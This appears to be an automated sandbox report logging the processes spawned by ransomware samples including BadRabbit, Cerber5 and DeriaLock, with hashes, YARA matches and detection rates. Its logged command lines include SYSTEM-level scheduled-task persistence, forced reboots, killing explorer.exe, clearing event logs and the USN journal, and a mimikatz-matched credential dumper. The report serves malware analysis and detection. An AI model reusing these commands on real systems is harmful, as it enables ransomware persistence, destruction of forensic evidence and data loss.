                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                      Reputation:high

                                                                                                                                                                                      Target ID:10
                                                                                                                                                                                      Start time:14:50:01
                                                                                                                                                                                      Start date:29/09/2022
                                                                                                                                                                                      Path:C:\Users\user\AppData\Local\Temp\Endermanch@BadRabbit.exe
                                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                                      Commandline:"C:\Users\user\AppData\Local\Temp\Endermanch@BadRabbit.exe"
                                                                                                                                                                                      Imagebase:0x1320000
                                                                                                                                                                                      File size:441899 bytes
                                                                                                                                                                                      MD5 hash:FBBDC39AF1139AEBBA4DA004475E8839
                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                      Programmed in:C, C++ or other language

                                                                                                                                                                                      Target ID:11
                                                                                                                                                                                      Start time:14:50:02
                                                                                                                                                                                      Start date:29/09/2022
                                                                                                                                                                                      Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                                      Commandline:/c schtasks /Delete /F /TN rhaegal
                                                                                                                                                                                      Imagebase:0x1b0000
                                                                                                                                                                                      File size:232960 bytes
                                                                                                                                                                                      MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                      Programmed in:C, C++ or other language

                                                                                                                                                                                      Target ID:12
                                                                                                                                                                                      Start time:14:50:02
                                                                                                                                                                                      Start date:29/09/2022
                                                                                                                                                                                      Path:C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                                      Commandline:taskkill /F /IM explorer.exe
                                                                                                                                                                                      Imagebase:0x990000
                                                                                                                                                                                      File size:74752 bytes
                                                                                                                                                                                      MD5 hash:15E2E0ACD891510C6268CB8899F2A1A1
                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                      Programmed in:C, C++ or other language

                                                                                                                                                                                      Target ID:13
                                                                                                                                                                                      Start time:14:50:02
                                                                                                                                                                                      Start date:29/09/2022
                                                                                                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                      Imagebase:0x7ff6da640000
                                                                                                                                                                                      File size:625664 bytes
                                                                                                                                                                                      MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                      Programmed in:C, C++ or other language

                                                                                                                                                                                      Target ID:14
                                                                                                                                                                                      Start time:14:50:03
                                                                                                                                                                                      Start date:29/09/2022
                                                                                                                                                                                      Path:C:\Users\user\AppData\Local\Temp\Endermanch@Birele.exe
                                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                                      Commandline:"C:\Users\user\AppData\Local\Temp\Endermanch@Birele.exe"
                                                                                                                                                                                      Imagebase:0x400000
                                                                                                                                                                                      File size:119296 bytes
                                                                                                                                                                                      MD5 hash:41789C704A0EECFDD0048B4B4193E752
                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                      Programmed in:Borland Delphi

                                                                                                                                                                                      Target ID:15
                                                                                                                                                                                      Start time:14:50:03
                                                                                                                                                                                      Start date:29/09/2022
                                                                                                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                      Imagebase:0x7ff6da640000
                                                                                                                                                                                      File size:625664 bytes
                                                                                                                                                                                      MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                      Programmed in:C, C++ or other language

                                                                                                                                                                                      Target ID:17
                                                                                                                                                                                      Start time:14:50:03
                                                                                                                                                                                      Start date:29/09/2022
                                                                                                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                      Imagebase:0x7ff6da640000
                                                                                                                                                                                      File size:625664 bytes
                                                                                                                                                                                      MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                      Programmed in:C, C++ or other language

                                                                                                                                                                                      Target ID:18
                                                                                                                                                                                      Start time:14:50:04
                                                                                                                                                                                      Start date:29/09/2022
                                                                                                                                                                                      Path:C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                                      Commandline:schtasks /Delete /F /TN rhaegal
                                                                                                                                                                                      Imagebase:0x9f0000
                                                                                                                                                                                      File size:185856 bytes
                                                                                                                                                                                      MD5 hash:15FF7D8324231381BAD48A052F85DF04
                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                      Programmed in:C, C++ or other language

                                                                                                                                                                                      Target ID:19
                                                                                                                                                                                      Start time:14:50:05
                                                                                                                                                                                      Start date:29/09/2022
                                                                                                                                                                                      Path:C:\Users\user\AppData\Local\Temp\Endermanch@Cerber5.exe
                                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                                      Commandline:"C:\Users\user\AppData\Local\Temp\Endermanch@Cerber5.exe"
                                                                                                                                                                                      Imagebase:0x400000
                                                                                                                                                                                      File size:320760 bytes
                                                                                                                                                                                      MD5 hash:FE1BC60A95B2C2D77CD5D232296A7FA4
                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                      Yara matches:
                                                                                                                                                                                      • Rule: Cerber, Description: Cerber Payload, Source: 00000013.00000002.412053021.0000000001720000.00000040.00001000.00020000.00000000.sdmp, Author: kevoreilly
                                                                                                                                                                                      • Rule: Cerber, Description: Cerber Payload, Source: 00000013.00000002.459335598.0000000005E70000.00000040.00001000.00020000.00000000.sdmp, Author: kevoreilly
                                                                                                                                                                                      • Rule: cerber3, Description: Cerber3 , Source: 00000013.00000000.299020841.0000000000448000.00000020.00000001.01000000.0000000A.sdmp, Author: pekeinfo
                                                                                                                                                                                      • Rule: cerber3, Description: Cerber3 , Source: 00000013.00000000.301994770.0000000000448000.00000020.00000001.01000000.0000000A.sdmp, Author: pekeinfo
                                                                                                                                                                                      • Rule: cerber3, Description: Cerber3 , Source: 00000013.00000000.299998392.0000000000448000.00000020.00000001.01000000.0000000A.sdmp, Author: pekeinfo
                                                                                                                                                                                      • Rule: Cerber, Description: Cerber Payload, Source: 00000013.00000002.406304332.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Author: kevoreilly
                                                                                                                                                                                      • Rule: cerber3, Description: Cerber3 , Source: 00000013.00000000.303477710.0000000000448000.00000020.00000001.01000000.0000000A.sdmp, Author: pekeinfo
                                                                                                                                                                                      • Rule: cerber3, Description: Cerber3 , Source: C:\Users\user\AppData\Local\Temp\Endermanch@Cerber5.exe, Author: pekeinfo
                                                                                                                                                                                      Antivirus matches:
                                                                                                                                                                                      • Detection: 100%, Avira
                                                                                                                                                                                      • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                                      • Detection: 91%, ReversingLabs
                                                                                                                                                                                      • Detection: 76%, Metadefender

                                                                                                                                                                                      Target ID:20
                                                                                                                                                                                      Start time:14:50:05
                                                                                                                                                                                      Start date:29/09/2022
                                                                                                                                                                                      Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                                      Commandline:/c schtasks /Create /RU SYSTEM /SC ONSTART /TN rhaegal /TR "C:\Windows\system32\cmd.exe /C Start \"\" \"C:\Windows\dispci.exe\" -id 1446829312 && exit"
                                                                                                                                                                                      Imagebase:0x1b0000
                                                                                                                                                                                      File size:232960 bytes
                                                                                                                                                                                      MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                      Programmed in:C, C++ or other language

                                                                                                                                                                                      Target ID:21
                                                                                                                                                                                      Start time:14:50:05
                                                                                                                                                                                      Start date:29/09/2022
                                                                                                                                                                                      Path:C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                                      Commandline:taskkill /F /IM explorer.exe
                                                                                                                                                                                      Imagebase:0x990000
                                                                                                                                                                                      File size:74752 bytes
                                                                                                                                                                                      MD5 hash:15E2E0ACD891510C6268CB8899F2A1A1
                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                      Programmed in:C, C++ or other language

                                                                                                                                                                                      Target ID:22
                                                                                                                                                                                      Start time:14:50:06
                                                                                                                                                                                      Start date:29/09/2022
                                                                                                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                      Imagebase:0x7ff6da640000
                                                                                                                                                                                      File size:625664 bytes
                                                                                                                                                                                      MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                      Programmed in:C, C++ or other language

                                                                                                                                                                                      Target ID:23
                                                                                                                                                                                      Start time:14:50:06
                                                                                                                                                                                      Start date:29/09/2022
                                                                                                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                      Imagebase:0x7ff6da640000
                                                                                                                                                                                      File size:625664 bytes
                                                                                                                                                                                      MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                      Programmed in:C, C++ or other language

                                                                                                                                                                                      Target ID:24
                                                                                                                                                                                      Start time:14:50:06
                                                                                                                                                                                      Start date:29/09/2022
                                                                                                                                                                                      Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                                      Commandline:/c schtasks /Create /SC once /TN drogon /RU SYSTEM /TR "C:\Windows\system32\shutdown.exe /r /t 0 /f" /ST 15:08:00
                                                                                                                                                                                      Imagebase:0x1b0000
                                                                                                                                                                                      File size:232960 bytes
                                                                                                                                                                                      MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                      Programmed in:C, C++ or other language

                                                                                                                                                                                      Target ID:25
                                                                                                                                                                                      Start time:14:50:06
                                                                                                                                                                                      Start date:29/09/2022
                                                                                                                                                                                      Path:C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                                      Commandline:schtasks /Create /RU SYSTEM /SC ONSTART /TN rhaegal /TR "C:\Windows\system32\cmd.exe /C Start \"\" \"C:\Windows\dispci.exe\" -id 1446829312 && exit"
                                                                                                                                                                                      Imagebase:0x9f0000
                                                                                                                                                                                      File size:185856 bytes
                                                                                                                                                                                      MD5 hash:15FF7D8324231381BAD48A052F85DF04
                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                      Programmed in:C, C++ or other language

                                                                                                                                                                                      Target ID:26
                                                                                                                                                                                      Start time:14:50:07
                                                                                                                                                                                      Start date:29/09/2022
                                                                                                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                      Imagebase:0x7ff6da640000
                                                                                                                                                                                      File size:625664 bytes
                                                                                                                                                                                      MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                      Programmed in:C, C++ or other language

                                                                                                                                                                                      Target ID:27
                                                                                                                                                                                      Start time:14:50:07
                                                                                                                                                                                      Start date:29/09/2022
                                                                                                                                                                                      Path:C:\Windows\5753.tmp
                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                      Commandline:"C:\Windows\5753.tmp" \\.\pipe\{BA7DC5E0-29E5-4FCA-A986-C2C71FD14928}
                                                                                                                                                                                      Imagebase:0x7ff7cef20000
                                                                                                                                                                                      File size:62328 bytes
                                                                                                                                                                                      MD5 hash:347AC3B6B791054DE3E5720A7144A977
                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                      Yara matches:
                                                                                                                                                                                      • Rule: mimikatz, Description: mimikatz, Source: 0000001B.00000000.303576856.00007FF7CEF2E000.00000008.00000001.01000000.0000000B.sdmp, Author: Benjamin DELPY (gentilkiwi)
                                                                                                                                                                                      • Rule: mimikatz, Description: mimikatz, Source: 0000001B.00000000.302953795.00007FF7CEF2E000.00000008.00000001.01000000.0000000B.sdmp, Author: Benjamin DELPY (gentilkiwi)
                                                                                                                                                                                      • Rule: mimikatz, Description: mimikatz, Source: 0000001B.00000002.305601128.00007FF7CEF2E000.00000004.00000001.01000000.0000000B.sdmp, Author: Benjamin DELPY (gentilkiwi)
                                                                                                                                                                                      • Rule: mimikatz, Description: mimikatz, Source: 0000001B.00000000.303401011.00007FF7CEF2E000.00000008.00000001.01000000.0000000B.sdmp, Author: Benjamin DELPY (gentilkiwi)

                                                                                                                                                                                      Target ID:28
                                                                                                                                                                                      Start time:14:50:07
                                                                                                                                                                                      Start date:29/09/2022
                                                                                                                                                                                      Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                      Commandline:c:\windows\system32\svchost.exe -k localservice -p -s CDPSvc
                                                                                                                                                                                      Imagebase:0x7ff603c50000
                                                                                                                                                                                      File size:51288 bytes
                                                                                                                                                                                      MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                      Has administrator privileges:false
                                                                                                                                                                                      Programmed in:C, C++ or other language

                                                                                                                                                                                      Target ID:29
                                                                                                                                                                                      Start time:14:50:07
                                                                                                                                                                                      Start date:29/09/2022
                                                                                                                                                                                      Path:C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                                      Commandline:schtasks /Create /SC once /TN drogon /RU SYSTEM /TR "C:\Windows\system32\shutdown.exe /r /t 0 /f" /ST 15:08:00
                                                                                                                                                                                      Imagebase:0x9f0000
                                                                                                                                                                                      File size:185856 bytes
                                                                                                                                                                                      MD5 hash:15FF7D8324231381BAD48A052F85DF04
                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                      Programmed in:C, C++ or other language

                                                                                                                                                                                      Target ID:30
                                                                                                                                                                                      Start time:14:50:07
                                                                                                                                                                                      Start date:29/09/2022
                                                                                                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                      Imagebase:0x7ff6da640000
                                                                                                                                                                                      File size:625664 bytes
                                                                                                                                                                                      MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                      Programmed in:C, C++ or other language

                                                                                                                                                                                      Target ID:31
                                                                                                                                                                                      Start time:14:50:08
                                                                                                                                                                                      Start date:29/09/2022
                                                                                                                                                                                      Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                      Commandline:C:\Windows\system32\cmd.exe /C Start "" "C:\Windows\dispci.exe" -id 1446829312 && exit
                                                                                                                                                                                      Imagebase:0x7ff7cb270000
                                                                                                                                                                                      File size:273920 bytes
                                                                                                                                                                                      MD5 hash:4E2ACF4F8A396486AB4268C94A6A245F
                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                      Programmed in:C, C++ or other language

                                                                                                                                                                                      Target ID:32
                                                                                                                                                                                      Start time:14:50:08
                                                                                                                                                                                      Start date:29/09/2022
                                                                                                                                                                                      Path:C:\Users\user\AppData\Local\Temp\Endermanch@BadRabbit.exe
                                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                                      Commandline:"C:\Users\user\AppData\Local\Temp\Endermanch@BadRabbit.exe"
                                                                                                                                                                                      Imagebase:0x1320000
                                                                                                                                                                                      File size:441899 bytes
                                                                                                                                                                                      MD5 hash:FBBDC39AF1139AEBBA4DA004475E8839
                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                      Programmed in:C, C++ or other language

                                                                                                                                                                                      Target ID:33
                                                                                                                                                                                      Start time:14:50:09
                                                                                                                                                                                      Start date:29/09/2022
                                                                                                                                                                                      Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                      Commandline:c:\windows\system32\svchost.exe -k networkservice -p -s DoSvc
                                                                                                                                                                                      Imagebase:0x7ff603c50000
                                                                                                                                                                                      File size:51288 bytes
                                                                                                                                                                                      MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                      Has administrator privileges:false
                                                                                                                                                                                      Programmed in:C, C++ or other language

                                                                                                                                                                                      Target ID:34
                                                                                                                                                                                      Start time:14:50:22
                                                                                                                                                                                      Start date:29/09/2022
                                                                                                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                      Imagebase:0x7ff6da640000
                                                                                                                                                                                      File size:625664 bytes
                                                                                                                                                                                      MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                      Programmed in:C, C++ or other language

                                                                                                                                                                                      Target ID:35
                                                                                                                                                                                      Start time:14:50:09
                                                                                                                                                                                      Start date:29/09/2022
                                                                                                                                                                                      Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                                      Commandline:/c wevtutil cl Setup & wevtutil cl System & wevtutil cl Security & wevtutil cl Application & fsutil usn deletejournal /D C:
                                                                                                                                                                                      Imagebase:0x1b0000
                                                                                                                                                                                      File size:232960 bytes
                                                                                                                                                                                      MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                      Programmed in:C, C++ or other language

                                                                                                                                                                                      Target ID:36
                                                                                                                                                                                      Start time:14:50:12
                                                                                                                                                                                      Start date:29/09/2022
                                                                                                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                      Imagebase:0x7ff6da640000
                                                                                                                                                                                      File size:625664 bytes
                                                                                                                                                                                      MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                      Programmed in:C, C++ or other language

                                                                                                                                                                                      Target ID:37
                                                                                                                                                                                      Start time:14:50:12
                                                                                                                                                                                      Start date:29/09/2022
                                                                                                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                      Imagebase:0x7ff6da640000
                                                                                                                                                                                      File size:625664 bytes
                                                                                                                                                                                      MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                      Programmed in:C, C++ or other language

                                                                                                                                                                                      Target ID:38
                                                                                                                                                                                      Start time:14:50:10
                                                                                                                                                                                      Start date:29/09/2022
                                                                                                                                                                                      Path:C:\Users\user\AppData\Local\Temp\Endermanch@Birele.exe
                                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                                      Commandline:"C:\Users\user\AppData\Local\Temp\Endermanch@Birele.exe"
                                                                                                                                                                                      Imagebase:0x400000
                                                                                                                                                                                      File size:119296 bytes
                                                                                                                                                                                      MD5 hash:41789C704A0EECFDD0048B4B4193E752
                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                      Programmed in:Borland Delphi

                                                                                                                                                                                      Target ID:39
                                                                                                                                                                                      Start time:14:50:10
                                                                                                                                                                                      Start date:29/09/2022
                                                                                                                                                                                      Path:C:\Windows\SysWOW64\netsh.exe
                                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                                      Commandline:C:\Windows\system32\netsh.exe advfirewall set allprofiles state on
                                                                                                                                                                                      Imagebase:0x970000
                                                                                                                                                                                      File size:82944 bytes
                                                                                                                                                                                      MD5 hash:A0AA3322BB46BBFC36AB9DC1DBBBB807
                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                      Programmed in:C, C++ or other language

                                                                                                                                                                                      Target ID:40
                                                                                                                                                                                      Start time:14:50:11
                                                                                                                                                                                      Start date:29/09/2022
                                                                                                                                                                                      Path:C:\Users\user\AppData\Local\Temp\Endermanch@Cerber5.exe
                                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                                      Commandline:"C:\Users\user\AppData\Local\Temp\Endermanch@Cerber5.exe"
                                                                                                                                                                                      Imagebase:0x400000
                                                                                                                                                                                      File size:320760 bytes
                                                                                                                                                                                      MD5 hash:FE1BC60A95B2C2D77CD5D232296A7FA4
                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                      Yara matches:
                                                                                                                                                                                      • Rule: cerber3, Description: Cerber3 , Source: 00000028.00000000.314208666.0000000000448000.00000020.00000001.01000000.0000000A.sdmp, Author: pekeinfo
                                                                                                                                                                                      • Rule: cerber3, Description: Cerber3 , Source: 00000028.00000000.312282421.0000000000448000.00000020.00000001.01000000.0000000A.sdmp, Author: pekeinfo
                                                                                                                                                                                      • Rule: Cerber, Description: Cerber Payload, Source: 00000028.00000002.329104231.0000000004DC0000.00000040.00001000.00020000.00000000.sdmp, Author: kevoreilly
                                                                                                                                                                                      • Rule: Cerber, Description: Cerber Payload, Source: 00000028.00000002.317439336.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Author: kevoreilly
                                                                                                                                                                                      • Rule: cerber3, Description: Cerber3 , Source: 00000028.00000000.312879365.0000000000448000.00000020.00000001.01000000.0000000A.sdmp, Author: pekeinfo
                                                                                                                                                                                      • Rule: cerber3, Description: Cerber3 , Source: 00000028.00000000.311585156.0000000000448000.00000020.00000001.01000000.0000000A.sdmp, Author: pekeinfo
                                                                                                                                                                                      • Rule: Cerber, Description: Cerber Payload, Source: 00000028.00000002.331419258.0000000004DF0000.00000040.00001000.00020000.00000000.sdmp, Author: kevoreilly

                                                                                                                                                                                      Target ID:41
                                                                                                                                                                                      Start time:14:50:12
                                                                                                                                                                                      Start date:29/09/2022
                                                                                                                                                                                      Path:C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                                      Commandline:taskkill /F /IM explorer.exe
                                                                                                                                                                                      Imagebase:0x990000
                                                                                                                                                                                      File size:74752 bytes
                                                                                                                                                                                      MD5 hash:15E2E0ACD891510C6268CB8899F2A1A1
                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                      Programmed in:C, C++ or other language

                                                                                                                                                                                      Target ID:42
                                                                                                                                                                                      Start time:14:50:13
                                                                                                                                                                                      Start date:29/09/2022
                                                                                                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                      Imagebase:0x7ff6da640000
                                                                                                                                                                                      File size:625664 bytes
                                                                                                                                                                                      MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                      Programmed in:C, C++ or other language

                                                                                                                                                                                      Target ID:43
                                                                                                                                                                                      Start time:14:50:13
                                                                                                                                                                                      Start date:29/09/2022
                                                                                                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                      Imagebase:0x7ff6da640000
                                                                                                                                                                                      File size:625664 bytes
                                                                                                                                                                                      MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                      Programmed in:C, C++ or other language

                                                                                                                                                                                      Target ID:44
                                                                                                                                                                                      Start time:14:50:13
                                                                                                                                                                                      Start date:29/09/2022
                                                                                                                                                                                      Path:C:\Users\user\AppData\Local\Temp\Endermanch@DeriaLock.exe
                                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                                      Commandline:"C:\Users\user\AppData\Local\Temp\Endermanch@DeriaLock.exe"
                                                                                                                                                                                      Imagebase:0xd80000
                                                                                                                                                                                      File size:495616 bytes
                                                                                                                                                                                      MD5 hash:0A7B70EFBA0AA93D4BC0857B87AC2FCB
                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                      Programmed in:.Net C# or VB.NET
                                                                                                                                                                                      Yara matches:
                                                                                                                                                                                      • Rule: JoeSecurity_DeriaLock, Description: Yara detected DeriaLock Ransomware, Source: 0000002C.00000000.315363439.0000000000DC6000.00000002.00000001.01000000.0000000D.sdmp, Author: Joe Security
                                                                                                                                                                                      • Rule: JoeSecurity_DeriaLock, Description: Yara detected DeriaLock Ransomware, Source: C:\Users\user\AppData\Local\Temp\Endermanch@DeriaLock.exe, Author: Joe Security
                                                                                                                                                                                      Antivirus matches:
                                                                                                                                                                                      • Detection: 100%, Avira
                                                                                                                                                                                      • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                                      • Detection: 92%, ReversingLabs
                                                                                                                                                                                      • Detection: 69%, Metadefender

                                                                                                                                                                                      Target ID:45
                                                                                                                                                                                      Start time:14:50:13
                                                                                                                                                                                      Start date:29/09/2022
                                                                                                                                                                                      Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                                      Commandline:/c schtasks /Delete /F /TN drogon
                                                                                                                                                                                      Imagebase:0x1b0000
                                                                                                                                                                                      File size:232960 bytes
                                                                                                                                                                                      MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                      Programmed in:C, C++ or other language

                                                                                                                                                                                      Target ID:46
                                                                                                                                                                                      Start time:14:50:14
                                                                                                                                                                                      Start date:29/09/2022
                                                                                                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                      Imagebase:0x7ff6da640000
                                                                                                                                                                                      File size:625664 bytes
                                                                                                                                                                                      MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                      Programmed in:C, C++ or other language

                                                                                                                                                                                      Target ID:47
                                                                                                                                                                                      Start time:14:50:14
                                                                                                                                                                                      Start date:29/09/2022
                                                                                                                                                                                      Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                                      Commandline:C:\Windows\system32\rundll32.exe C:\Windows\infpub.dat,#1 15
                                                                                                                                                                                      Imagebase:0x850000
                                                                                                                                                                                      File size:61952 bytes
                                                                                                                                                                                      MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
